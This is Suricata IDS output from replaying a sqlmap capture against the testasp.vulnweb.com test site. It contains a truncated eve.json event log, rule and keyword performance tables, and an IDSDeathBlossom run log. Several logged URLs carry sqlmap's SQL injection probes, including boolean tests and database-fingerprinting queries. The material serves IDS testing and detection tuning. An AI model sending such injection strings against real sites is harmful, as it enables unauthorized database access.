{"timestamp":"2018-11-16T10:17:49.786283+0000","flow_id":1509700756351997,"pcap_cnt":78,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43754,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":15382},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":15382,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.794678+0000","flow_id":291867074506174,"pcap_cnt":80,"event_type":"http","src_ip":"192.168.5.137","src_port":43756,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=4293","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.817922+0000","flow_id":291867074506174,"pcap_cnt":86,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43756,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=4293","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.824392+0000","flow_id":2235421380365885,"pcap_cnt":88,"event_type":"http","src_ip":"192.168.5.137","src_port":43758,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1.%27%28%22.%28%2C%2C%28%2C","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.847478+0000","flow_id":2235421380365885,"pcap_cnt":94,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43758,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1.%27%28%22.%28%2C%2C%28%2C","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.856755+0000","flow_id":2238419267568878,"pcap_cnt":96,"event_type":"http","src_ip":"192.168.5.137","src_port":43764,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%27yOuEbg%3C%27%22%3EsEWEcs","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.893641+0000","flow_id":2238419267568878,"pcap_cnt":100,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43764,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%27yOuEbg%3C%27%22%3EsEWEcs","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.930465+0000","flow_id":1140844670076496,"pcap_cnt":104,"event_type":"http","src_ip":"192.168.5.137","src_port":43766,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%29%20AND%206404%3D5435%20AND%20%283555%3D3555","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.953477+0000","flow_id":1140844670076496,"pcap_cnt":110,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43766,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%29%20AND%206404%3D5435%20AND%20%283555%3D3555","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.958573+0000","flow_id":1281831266502690,"pcap_cnt":112,"event_type":"http","src_ip":"192.168.5.137","src_port":43768,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%29%20AND%202455%3D2455%20AND%20%286838%3D6838","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.981749+0000","flow_id":1281831266502690,"pcap_cnt":118,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43768,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%29%20AND%202455%3D2455%20AND%20%286838%3D6838","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.987305+0000","flow_id":1743325502492513,"pcap_cnt":120,"event_type":"http","src_ip":"192.168.5.137","src_port":43770,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%206116%3D3751","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.011018+0000","flow_id":1743325502492513,"pcap_cnt":125,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43770,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%206116%3D3751","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.614175+0000","flow_id":327747231411215,"pcap_cnt":143,"event_type":"http","src_ip":"192.168.5.137","src_port":43772,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%202455%3D2455","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.637670+0000","flow_id":327747231411215,"pcap_cnt":144,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43772,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%202455%3D2455","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":15434},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":15434,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.668673+0000","flow_id":1445521060097630,"pcap_cnt":148,"event_type":"http","src_ip":"192.168.5.137","src_port":43774,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%201069%3D8014","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.691957+0000","flow_id":1445521060097630,"pcap_cnt":154,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43774,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%201069%3D8014","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.701186+0000","flow_id":2111597473296823,"pcap_cnt":156,"event_type":"http","src_ip":"192.168.5.137","src_port":43776,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHR%2870%29%26CHR%28117%29%26CHR%28101%29%26CHR%28118%29%20FROM%20MSysAccessObjects%29%3D%27Fuev%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.724139+0000","flow_id":2111597473296823,"pcap_cnt":162,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43776,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHR%2870%29%26CHR%28117%29%26CHR%28101%29%26CHR%28118%29%20FROM%20MSysAccessObjects%29%3D%27Fuev%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.731882+0000","flow_id":1924195165286807,"pcap_cnt":164,"event_type":"http","src_ip":"192.168.5.137","src_port":43778,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHR%2867%29%7C%7CCHR%2871%29%7C%7CCHR%28113%29%7C%7CCHR%2872%29%20FROM%20SYSIBM.SYSDUMMY1%29%3D%27CGqH%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.755472+0000","flow_id":1924195165286807,"pcap_cnt":170,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43778,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHR%2867%29%7C%7CCHR%2871%29%7C%7CCHR%28113%29%7C%7CCHR%2872%29%20FROM%20SYSIBM.SYSDUMMY1%29%3D%27CGqH%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.759717+0000","flow_id":1957764629721073,"pcap_cnt":172,"event_type":"http","src_ip":"192.168.5.137","src_port":43780,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20%27exuE%27%20FROM%20RDB%24DATABASE%29%3D%27exuE%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.782597+0000","flow_id":1957764629721073,"pcap_cnt":177,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43780,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20%27exuE%27%20FROM%20RDB%24DATABASE%29%3D%27exuE%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.788739+0000","flow_id":776661508190747,"pcap_cnt":180,"event_type":"http","src_ip":"192.168.5.137","src_port":43782,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHAR%28104%29%7C%7CCHAR%28120%29%7C%7CCHAR%28105%29%7C%7CCHAR%28104%29%29%3D%27hxih%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.811936+0000","flow_id":776661508190747,"pcap_cnt":185,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43782,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHAR%28104%29%7C%7CCHAR%28120%29%7C%7CCHAR%28105%29%7C%7CCHAR%28104%29%29%3D%27hxih%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.817622+0000","flow_id":1504117299016712,"pcap_cnt":187,"event_type":"http","src_ip":"192.168.5.137","src_port":43784,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"

This file has been truncated.


keyword_perf.log - (6957 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 11/16/2018 -- 10:19:31
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             5209951         1527            1527            103405          3411.00         3411.00         0.00           
  content          6301287         1655            793             53100           3807.00         3728.00         3880.00        
  pcre             1543913         291             0               77571           5305.00         0.00            5305.00        
  urilen           3673            1               1               3673            3673.00         3673.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             5209951         1527            1527            103405          3411.00         3411.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2017034         450             180             49853           4482.00         3903.00         4868.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1568432         421             292             53100           3725.00         3642.00         3912.00        
  pcre             1543913         291             0               77571           5305.00         0.00            5305.00        
  urilen           3673            1               1               3673            3673.00         3673.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          123432          35              0               14350           3526.00         0.00            3526.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          133156          35              0               5500            3804.00         0.00            3804.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          843644          250             160             33450           3374.00         3693.00         2807.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1473318         429             126             35735           3434.00         3627.00         3354.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          142271          35              35              34664           4064.00         4064.00         0.00           


suricata-4.0.0-etopen-all-perf.txt-2018-11-16-T-10-19-31-11162018.1019-sqlmap.pcap.txt - (7383 bytes)
  --------------------------------------------------------------------------
  Date: 11/16/2018 -- 10:19:31. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2021118      1        3        4439911      8.29   126      0        502276      35237.39    0.00        35237.39   
  2        2017552      1        6        8461661      15.80  448      0        430216      18887.64    0.00        18887.64   
  3        2016537      1        2        5475153      10.22  322      0        396133      17003.58    0.00        17003.58   
  4        2021214      1        2        3856271      7.20   126      0        238301      30605.33    0.00        30605.33   
  5        2024771      1        1        5211848      9.73   333      0        125506      15651.20    0.00        15651.20   
  6        2012612      1        16       1334262      2.49   51       0        123386      26162.00    0.00        26162.00   
  7        2022074      1        3        1363842      2.55   39       0        115188      34970.31    0.00        34970.31   
  8        2021407      1        4        552980       1.03   126      0        109071      4388.73     0.00        4388.73    
  9        2100540      1        12       852988       1.59   250      0        90072       3411.95     0.00        3411.95    
  10       2010525      1        4        4278474      7.99   180      0        77553       23769.30    0.00        23769.30   
  11       2020295      1        6        3762635      7.02   126      0        73663       29862.18    0.00        29862.18   
  12       2011037      1        5        190731       0.36   41       0        72967       4651.98     0.00        4651.98    
  13       2008420      1        4        1013777      1.89   252      0        72479       4022.92     0.00        4022.92    
  14       2022502      1        4        2872998      5.36   126      0        63678       22801.57    0.00        22801.57   
  15       2012707      1        5        849443       1.59   35       0        57708       24269.80    0.00        24269.80   
  16       2100540      1        12       848555       1.58   250      0        52890       3394.22     0.00        3394.22    
  17       2010524      1        3        823814       1.54   180      0        50239       4576.74     0.00        4576.74    
  18       2006446      1        12       306520       0.57   93       0        43868       3295.91     0.00        3295.91    
  19       2010963      1        6        312887       0.58   93       0        43456       3364.38     0.00        3364.38    
  20       2023316      1        2        399552       0.75   124      0        40378       3222.19     0.00        3222.19    
  21       2018407      1        9        39972        0.07   1        0        39972       39972.00    0.00        39972.00   
  22       2009985      1        2        619316       1.16   186      0        39056       3329.66     0.00        3329.66    
  23       2010513      1        5        181627       0.34   35       0        38458       5189.34     0.00        5189.34    
  24       2010284      1        4        306030       0.57   93       0        36641       3290.65     0.00        3290.65    
  25       2102523      1        8        454829       0.85   129      0        31962       3525.81     0.00        3525.81    
  26       2010285      1        6        302645       0.57   93       0        27295       3254.25     0.00        3254.25    
  27       2010966      1        3        419013       0.78   126      0        27281       3325.50     0.00        3325.50    
  28       2024513      1        5        389090       0.73   125      0        26134       3112.72     0.00        3112.72    
  29       2008175      1        5        140145       0.26   39       0        25812       3593.46     0.00        3593.46    
  30       2013791      1        2        139694       0.26   40       0        23637       3492.35     0.00        3492.35    
  31       2008538      1        7        413161       0.77   126      0        23488       3279.06     0.00        3279.06    
  32       2025113      1        2        23388        0.04   1        0        23388       23388.00    0.00        23388.00   
  33       2015872      1        6        22508        0.04   1        0        22508       22508.00    0.00        22508.00   
  34       2018067      1        3        431412       0.81   126      0        21393       3423.90     0.00        3423.90    
  35       2011042      1        3        285550       0.53   93       0        17412       3070.43     0.00        3070.43    
  36       2016112      1        3        115996       0.22   35       0        10327       3314.17     0.00        3314.17    
  37       2009981      1        2        536624       1.00   186      0        5126        2885.08     0.00        2885.08    
  38       2006445      1        13       285496       0.53   93       0        4612        3069.85     0.00        3069.85    
  39       2102523      1        8        368446       0.69   129      0        4351        2856.17     0.00        2856.17    
  40       2014352      1        3        205804       0.38   68       0        4306        3026.53     0.00        3026.53    
  41       2016948      1        2        267334       0.50   90       0        4214        2970.38     0.00        2970.38    
  42       2010515      1        6        110436       0.21   35       0        4163        3155.31     0.00        3155.31    
  43       2014890      1        2        118238       0.22   40       0        4031        2955.95     0.00        2955.95    
  44       2101379      1        13       3710         0.01   1        0        3710        3710.00     0.00        3710.00    
  45       2014704      1        7        139053       0.26   48       0        3584        2896.94     0.00        2896.94    
  46       2017808      1        2        6639         0.01   2        0        3553        3319.50     0.00        3319.50    
  47       2009714      1        7        3492         0.01   1        0        3492        3492.00     0.00        3492.00    
  48       2101634      1        15       3319         0.01   1        0        3319        3319.00     0.00        3319.00    
  49       2009815      1        5        3299         0.01   1        0        3299        3299.00     0.00        3299.00    
  50       2101621      1        12       6008         0.01   2        0        3216        3004.00     0.00        3004.00    
  51       2102110      1        4        3206         0.01   1        0        3206        3206.00     0.00        3206.00    
  52       2010967      1        3        3183         0.01   1        0        3183        3183.00     0.00        3183.00    
  53       2101972      1        18       5327         0.01   2        0        2752        2663.50     0.00        2663.50    
  54       2100356      1        7        2555         0.00   1        0        2555        2555.00     0.00        2555.00    


IDSDeathBlossom.py.log - (1149 bytes)
2018-11-16 10:19:20,630 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2018-11-16 10:19:21,440 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2018-11-16 10:19:21,440 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etopen-all
2018-11-16 10:19:21,441 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2018-11-16 10:19:21,441 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2018-11-16 10:19:21,441 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/c8027fddb943c33d197316babb1cbf5ed2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/11162018.1019-sqlmap.pcap -vvv -k none
2018-11-16 10:19:31,137 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2018-11-16 10:19:31,138 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 10.5164849758